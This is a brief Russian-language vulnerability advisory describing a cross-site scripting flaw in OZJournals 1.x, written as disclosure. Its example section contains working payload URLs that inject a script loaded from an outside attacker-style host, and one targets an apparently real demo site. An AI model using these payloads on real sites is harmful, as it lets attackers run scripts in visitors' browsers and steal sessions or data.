Программа: OZJournals 1.x

Уязвимость позволяет удаленному
пользователю произвести XSS нападение,
выполнить произвольные скрипты в контексте
уязвимого сайта.

Пример:

http://example.com/index.php?show=archives&y=2006&m=
[script%20src=http://www.youfucktard.com/xss.js][/script]

http://example.com/index.php?show=archives&c=
http://ozjournals.awardspace.com/index.php?show= archives&c=[script%20src=http://www.youfucktard.com/xss.js][/script]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии